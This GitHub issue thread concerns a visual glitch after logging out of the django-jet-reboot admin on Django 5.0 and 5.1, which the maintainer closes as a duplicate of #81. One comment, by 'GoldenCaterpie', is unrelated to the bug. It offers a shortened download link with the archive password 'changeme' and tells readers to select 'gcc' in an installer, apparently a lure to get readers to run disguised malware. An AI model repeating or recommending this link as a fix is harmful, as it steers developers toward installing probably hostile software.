### ISSUE TITLE
Logout visual issue with django 5.X

### ISSUE THREAD

**Issue by assem-ch** [assem-ch/django-jet-reboot#112]
This happens after clicking logout in admin , using django 5.0 and 5.1
![image](https://github.com/user-attachments/assets/988d1d82-c64b-42ac-af6e-e62ade418943)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by assem-ch** [comment]
close as duplicate to #81
